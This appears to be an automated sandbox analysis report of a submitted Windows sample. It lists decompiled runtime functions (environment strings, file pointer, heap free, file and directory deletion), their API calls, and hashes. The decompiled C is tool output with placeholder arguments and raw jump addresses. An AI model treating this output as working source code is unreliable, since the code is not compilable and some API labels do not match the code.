                                                                                                                                                                                                                              0x7ff735c596d2
                                                                                                                                                                                                                              0x7ff735c596da
                                                                                                                                                                                                                              0x7ff735c596de
                                                                                                                                                                                                                              0x7ff735c596e6
                                                                                                                                                                                                                              0x7ff735c596ee
                                                                                                                                                                                                                              0x7ff735c596f6
                                                                                                                                                                                                                              0x7ff735c596fa
                                                                                                                                                                                                                              0x7ff735c5971b
                                                                                                                                                                                                                              0x7ff735c59722
                                                                                                                                                                                                                              0x7ff735c59729
                                                                                                                                                                                                                              0x7ff735c59731
                                                                                                                                                                                                                              0x7ff735c59744

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF735C594F5,?,?,00000000,00007FF735C595AA), ref: 00007FF735C596E6
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF735C594F5,?,?,00000000,00007FF735C595AA), ref: 00007FF735C596F0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1687624791-0
                                                                                                                                                                                                                              • Opcode ID: 2e2e9afe3ae63ede7caae088e9d4313ba30f88c05b81abeadf87772db978b0fa
                                                                                                                                                                                                                              • Instruction ID: 320e2b5d9e496f314a301fb742f9fa46ccdb8ace4e6a95317a973052913078e2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e2e9afe3ae63ede7caae088e9d4313ba30f88c05b81abeadf87772db978b0fa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79210793B0864321EE9077A2949037CD2A19F44FA8FC40A75D92E073D5CE6CE489E320
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C4A430 Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 67%
                                                                                                                                                                                                                              			E00007FF77FF735C4A430(intOrPtr* __rax) {
				void* __rbx;
				void* _t2;
				intOrPtr _t6;
				void* _t20;
				intOrPtr* _t32;
				void* _t33;
				void* _t34;
				void* _t37;

				_t32 = __rax;
				E00007FF77FF735C571D8(_t2, 2);
				E00007FF77FF735C54E7C(E00007FF77FF735C4AC3C(), __rax, _t34);
				_t6 = E00007FF77FF735C44FE0();
				E00007FF77FF735C58128(_t6);
				 *_t32 = _t6;
				if (E00007FF77FF735C4A9C0(1, _t32) == 0) goto 0x35c4a4db;
				E00007FF77FF735C4AEF0(_t33);
				E00007FF77FF735C4AB70(E00007FF77FF735C4A9C0(1, _t32), _t32);
				if (E00007FF77FF735C5746C(E00007FF77FF735C4AC34(), _t32, _t33, E00007FF77FF735C4AF2C, _t37) != 0) goto 0x35c4a4db;
				E00007FF77FF735C4AC44();
				if (E00007FF77FF735C4AC7C() == 0) goto 0x35c4a4a3;
				E00007FF77FF735C430F0(E00007FF77FF735C430F0(E00007FF77FF735C57240(_t13, 0x7ff735c44fe0)));
				E00007FF77FF735C58088(E00007FF77FF735C44FE0(), _t32, 0x7ff735c44fe0);
				if (E00007FF77FF735C4AC54() == 0) goto 0x35c4a4c7; // executed
				0x35c57bd4(); // executed
				_t20 = E00007FF77FF735C44FE0();
				0x35c4ae28();
				if (_t20 != 0) goto 0x35c4a4db;
				return _t20;
			}











                                                                                                                                                                                                                              0x7ff735c4a430
                                                                                                                                                                                                                              0x7ff735c4a43b
                                                                                                                                                                                                                              0x7ff735c4a447
                                                                                                                                                                                                                              0x7ff735c4a44c
                                                                                                                                                                                                                              0x7ff735c4a453
                                                                                                                                                                                                                              0x7ff735c4a45d
                                                                                                                                                                                                                              0x7ff735c4a466
                                                                                                                                                                                                                              0x7ff735c4a468
                                                                                                                                                                                                                              0x7ff735c4a474
                                                                                                                                                                                                                              0x7ff735c4a487
                                                                                                                                                                                                                              0x7ff735c4a489
                                                                                                                                                                                                                              0x7ff735c4a495
                                                                                                                                                                                                                              0x7ff735c4a4a8
                                                                                                                                                                                                                              0x7ff735c4a4b4
                                                                                                                                                                                                                              0x7ff735c4a4c0
                                                                                                                                                                                                                              0x7ff735c4a4c2
                                                                                                                                                                                                                              0x7ff735c4a4c7
                                                                                                                                                                                                                              0x7ff735c4a4cc
                                                                                                                                                                                                                              0x7ff735c4a4d3
                                                                                                                                                                                                                              0x7ff735c4a4da

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3548387204-0
                                                                                                                                                                                                                              • Opcode ID: 331a59cbc4ea868692e23eb5888001ef946d95beffc084f95d3597e3537265f8
                                                                                                                                                                                                                              • Instruction ID: 7dd0612fec4e7911bd8ff8783cbbe405a78238ba12d87be704d583712278b797
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 331a59cbc4ea868692e23eb5888001ef946d95beffc084f95d3597e3537265f8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3711BDD7E0812322FA9673F15947ABC81835F50B4CFD41430ED0D466C3ED1DA4826632
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C610F0 Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                                                                                              			E00007FF77FF735C610F0(signed int __rax, long long __rbx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				signed long long _t25;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				GetEnvironmentStringsW();
				if (__rax == 0) goto 0x35c61177;
				if ( *__rax == 0) goto 0x35c61136;
				_t25 = (__rax | 0xffffffff) + 1;
				if ( *((intOrPtr*)(__rax + _t25 * 2)) != 0) goto 0x35c61120;
				if ( *((intOrPtr*)(__rax + _t25 * 2 + 2)) != 0) goto 0x35c6111c;
				E00007FF77FF735C5C140(_t25, (__rax + _t25 * 2 + 2 - __rax + 2 >> 1) + (__rax + _t25 * 2 + 2 - __rax + 2 >> 1)); // executed
				if (_t25 == 0) goto 0x35c61164;
				E00007FF77FF735C4B150();
				E00007FF77FF735C59468(_t25, _t25);
				return FreeEnvironmentStringsW(??);
			}




                                                                                                                                                                                                                              0x7ff735c610f0
                                                                                                                                                                                                                              0x7ff735c610f5
                                                                                                                                                                                                                              0x7ff735c610fa
                                                                                                                                                                                                                              0x7ff735c61104
                                                                                                                                                                                                                              0x7ff735c61112
                                                                                                                                                                                                                              0x7ff735c6111a
                                                                                                                                                                                                                              0x7ff735c61120
                                                                                                                                                                                                                              0x7ff735c61127
                                                                                                                                                                                                                              0x7ff735c61134
                                                                                                                                                                                                                              0x7ff735c61146
                                                                                                                                                                                                                              0x7ff735c61151
                                                                                                                                                                                                                              0x7ff735c6115c
                                                                                                                                                                                                                              0x7ff735c61166
                                                                                                                                                                                                                              0x7ff735c6118b

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF735C57682,?,?,00000000,00007FF735C57B76,?,?,?,?,00007FF735C5FAA4,?,?,00000000), ref: 00007FF735C61104
                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF735C57682,?,?,00000000,00007FF735C57B76,?,?,?,?,00007FF735C5FAA4,?,?,00000000), ref: 00007FF735C6116E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EnvironmentStrings$Free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3328510275-0
                                                                                                                                                                                                                              • Opcode ID: 61fdecaed384942beb438f8648c1d3e7b37f96e5897cab2ea790937b5575e9bf
                                                                                                                                                                                                                              • Instruction ID: 6e05368d323cffb30bff1cc8871588c2cc0827b71a7db67ea53da7350e1b2601
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 61fdecaed384942beb438f8648c1d3e7b37f96e5897cab2ea790937b5575e9bf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB01A512E087A791EA20BB62641506AE370EB54FE4F8C4730DF9E13BC5DE2CE942D320
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C5AC68 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 37%
                                                                                                                                                                                                                              			E00007FF77FF735C5AC68(signed int __ecx, void* __edx, void* __edi, void* __eflags, void* __rax, long long __rbx, void* __rdx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
				intOrPtr _v24;
				int _t22;
				void* _t24;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				E00007FF77FF735C56534(__edi, __rax);
				if (__rax != 0xffffffff) goto 0x35c5aca6;
				 *((char*)(__r9 + 0x30)) = 1;
				 *((intOrPtr*)(__r9 + 0x2c)) = 9;
				goto 0x35c5acfc;
				r9d = r8d;
				_t22 = SetFilePointerEx(??, ??, ??, ??); // executed
				if (_t22 != 0) goto 0x35c5acd0;
				_t24 = E00007FF77FF735C53AD4(GetLastError(), __r9);
				goto 0x35c5aca0;
				if (_v24 == 0xffffffff) goto 0x35c5aca0;
				 *( *((intOrPtr*)(0x35c8aa40 + (__ecx >> 6) * 8)) + 0x38 + (__ecx + __ecx * 8) * 8) =  *( *((intOrPtr*)(0x35c8aa40 + (__ecx >> 6) * 8)) + 0x38 + (__ecx + __ecx * 8) * 8) & 0x000000fd;
				return _t24;
			}






                                                                                                                                                                                                                              0x7ff735c5ac68
                                                                                                                                                                                                                              0x7ff735c5ac6d
                                                                                                                                                                                                                              0x7ff735c5ac72
                                                                                                                                                                                                                              0x7ff735c5ac8a
                                                                                                                                                                                                                              0x7ff735c5ac93
                                                                                                                                                                                                                              0x7ff735c5ac95
                                                                                                                                                                                                                              0x7ff735c5ac99
                                                                                                                                                                                                                              0x7ff735c5aca4
                                                                                                                                                                                                                              0x7ff735c5aca6
                                                                                                                                                                                                                              0x7ff735c5acb4
                                                                                                                                                                                                                              0x7ff735c5acbc
                                                                                                                                                                                                                              0x7ff735c5acc9
                                                                                                                                                                                                                              0x7ff735c5acce
                                                                                                                                                                                                                              0x7ff735c5acd9
                                                                                                                                                                                                                              0x7ff735c5acf7
                                                                                                                                                                                                                              0x7ff735c5ad10

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetFilePointerEx.KERNELBASE(?,?,?,?,00000000,00007FF735C5AE01), ref: 00007FF735C5ACB4
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00000000,00007FF735C5AE01), ref: 00007FF735C5ACBE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                              • Opcode ID: 8bdbed2554947cf3087efaf73977d0acf805018c21be4a6724ff00ec8881c104
                                                                                                                                                                                                                              • Instruction ID: 28214960d81e9c385af51f25b30af6e5be27a91b4eb7c020788275ed8ebc4ec2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8bdbed2554947cf3087efaf73977d0acf805018c21be4a6724ff00ec8881c104
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6711B2A2718A8392DB10AB66A804179F361EB84FF8F984731EE7D077D9CE3CE0509740
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C54050 Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF735C53F65), ref: 00007FF735C54083
                                                                                                                                                                                                                              • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF735C53F65), ref: 00007FF735C54099
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1707611234-0
                                                                                                                                                                                                                              • Opcode ID: e3b3b4f6ec902b1b56c43f111239dad16264f4fa0cd5706571a8afff315be733
                                                                                                                                                                                                                              • Instruction ID: a9245ffa4379825a1e48921430160bc3685530f59a36613239ee357b9fa36de2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3b3b4f6ec902b1b56c43f111239dad16264f4fa0cd5706571a8afff315be733
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F211A7B360C65391EB54AB52A44107AF760FB81F69FA00235FA9E419D8EF3CD054EB10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C55FC0 Relevance: 3.0, APIs: 2, Instructions: 35timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF735C55E3D), ref: 00007FF735C55FE3
                                                                                                                                                                                                                              • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF735C55E3D), ref: 00007FF735C55FF9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1707611234-0
                                                                                                                                                                                                                              • Opcode ID: 71155f876d12651488feb454548f4c2d67dce348f1fbdeca7bba55e9542be1a2
                                                                                                                                                                                                                              • Instruction ID: 63ae549e1e769fb165eb05cb74339bf4265d3227ba61dcf9afdd201273a95ebb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 71155f876d12651488feb454548f4c2d67dce348f1fbdeca7bba55e9542be1a2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2701827360C29392E7506F15E44113AF7B1FB81F69FA00335E6A9019D8EB3DD044EB20
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C59468 Relevance: 3.0, APIs: 2, Instructions: 19COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                                                                                              			E00007FF77FF735C59468(intOrPtr* __rax, void* __rcx) {
				int _t1;
				intOrPtr _t3;
				void* _t4;
				void* _t11;
				intOrPtr _t14;

				if (__rcx == 0) goto 0x35c594a3;
				_t14 =  *0x35c8b270; // 0x29361990000, executed
				_t1 = HeapFree(_t11, ??); // executed
				if (_t1 != 0) goto 0x35c5949e;
				_t3 = E00007FF77FF735C53A44(GetLastError(), __rax, _t14, __rcx);
				_t4 = E00007FF77FF735C53B18(__rax);
				 *__rax = _t3;
				return _t4;
			}








                                                                                                                                                                                                                              0x7ff735c5946b
                                                                                                                                                                                                                              0x7ff735c59477
                                                                                                                                                                                                                              0x7ff735c5947e
                                                                                                                                                                                                                              0x7ff735c59486
                                                                                                                                                                                                                              0x7ff735c59490
                                                                                                                                                                                                                              0x7ff735c59497
                                                                                                                                                                                                                              0x7ff735c5949c
                                                                                                                                                                                                                              0x7ff735c594a3

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlReleasePrivilege.NTDLL(?,?,?,00007FF735C6138E,?,?,?,00007FF735C613CB,?,?,00000000,00007FF735C6189C,?,?,?,00007FF735C617CF), ref: 00007FF735C5947E
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF735C6138E,?,?,?,00007FF735C613CB,?,?,00000000,00007FF735C6189C,?,?,?,00007FF735C617CF), ref: 00007FF735C59488
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastPrivilegeRelease
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1334314998-0
                                                                                                                                                                                                                              • Opcode ID: c92c23cf82de40cce9af073732bb4b2c37aa6e77a8b740bb4df2041de20ac8c2
                                                                                                                                                                                                                              • Instruction ID: 81887beefc435531204f76f833e130e6beb4772d87b389a79c882e6387fd4ce5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c92c23cf82de40cce9af073732bb4b2c37aa6e77a8b740bb4df2041de20ac8c2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14E08692F0920372FF157BF39444079D2619F44F58FC44430C80D42252EE2C6945E274
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C55D28 Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                                                                                              			E00007FF77FF735C55D28() {
				int _t1;
				void* _t9;
				void* _t10;

				_t1 = RemoveDirectoryW(); // executed
				if (_t1 != 0) goto 0x35c55d48;
				E00007FF77FF735C53A8C(GetLastError(), _t9, _t10);
				goto 0x35c55d4a;
				return 0;
			}






                                                                                                                                                                                                                              0x7ff735c55d2c
                                                                                                                                                                                                                              0x7ff735c55d34
                                                                                                                                                                                                                              0x7ff735c55d3e
                                                                                                                                                                                                                              0x7ff735c55d46
                                                                                                                                                                                                                              0x7ff735c55d4e

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DirectoryErrorLastRemove
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 377330604-0
                                                                                                                                                                                                                              • Opcode ID: 8e53f5c20777c27e594f1758e2e180224a092a545309122e709bc5da37a3366e
                                                                                                                                                                                                                              • Instruction ID: a03b37166229cfa279dd9787ec596948fefdae161b251e322012f85218888751
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e53f5c20777c27e594f1758e2e180224a092a545309122e709bc5da37a3366e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64D0C952E18543E1EA5437F74809078E1A06F44F28FD00A34D41D812D2DE5CA145A521
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C56B78 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                                                                                              			E00007FF77FF735C56B78() {
				int _t1;
				void* _t9;
				void* _t10;

				_t1 = DeleteFileW(); // executed
				if (_t1 != 0) goto 0x35c56b98;
				E00007FF77FF735C53A8C(GetLastError(), _t9, _t10);
				goto 0x35c56b9a;
				return 0;
			}






                                                                                                                                                                                                                              0x7ff735c56b7c
                                                                                                                                                                                                                              0x7ff735c56b84
                                                                                                                                                                                                                              0x7ff735c56b8e
                                                                                                                                                                                                                              0x7ff735c56b96
                                                                                                                                                                                                                              0x7ff735c56b9e

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
